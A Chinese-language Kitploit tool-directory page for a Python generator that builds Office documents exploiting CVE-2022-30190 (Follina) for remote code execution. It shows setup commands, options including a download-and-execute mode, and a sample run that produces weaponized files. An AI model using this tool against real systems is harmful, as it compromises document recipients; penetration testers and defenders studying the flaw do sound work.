Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2022-30190 — 生成利用CVE-2022-30190通过HTML payload实现远程代码执行的Microsoft Office文档的Python脚本,支持自定义命令和下载并执行模式。 | Kitploit
工具/GitHubGitHub/joshuavanderpoll/cve-2022-30190
Payload生成漏洞利用Web应用程序漏洞利用渗透测试命令与控制
GitHubjoshuavanderpoll/cve-2022-30190

CVE-2022-30190

生成利用CVE-2022-30190通过HTML payload实现远程代码执行的Microsoft Office文档的Python脚本,支持自定义命令和下载并执行模式。

查看仓库
11254年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2022-30190 - Microsoft 支持诊断工具

关于

该脚本将尝试创建一个 Microsoft Office 文档,用于远程执行代码。

设置

root@kitploit:~
git clone https://github.com/joshuavanderpoll/CVE-2022-30190.git
cd CVE-2022-30190
python3 CVE-2022-30190.py --help

选项

root@kitploit:~
usage: CVE-2022-30190.py [-h] [--html HTML] [--cmd CMD] [--downexec]
                         [--download_url DOWNLOAD_URL]

生成 CVE-2022-30190 Word 文档。

可选参数:
  -h, --help            显示此帮助信息并退出
  --html HTML           在线漏洞利用 HTML 文件的 URL
  --cmd CMD             运行时想要执行的命令
  --downexec            启用下载并执行模式
  --download_url DOWNLOAD_URL
                        下载并执行的来源地址

示例

root@kitploit:~
$ python3 CVE-2022-30190.py --doc="Original.docx" --html="http://localhost/Exploit.html" --cmd="start https://github.com/joshuavanderpoll"
[@] 正在启动 CVE-2022-30190 生成器...
[•] 由 https://github.com/joshuavanderpoll 创建
[•] 使用 Word 文档:Original.docx
[•] 正在解压 Word 文档...
[•] Word 文档已解压。
[√] 漏洞利用 Word 文档已保存至 "./builds/Exploit.docx"(1109 字节)。
[√] 漏洞利用 HTML 文件已保存至 "./builds/Exploit.html"(4241 字节)。
下载工具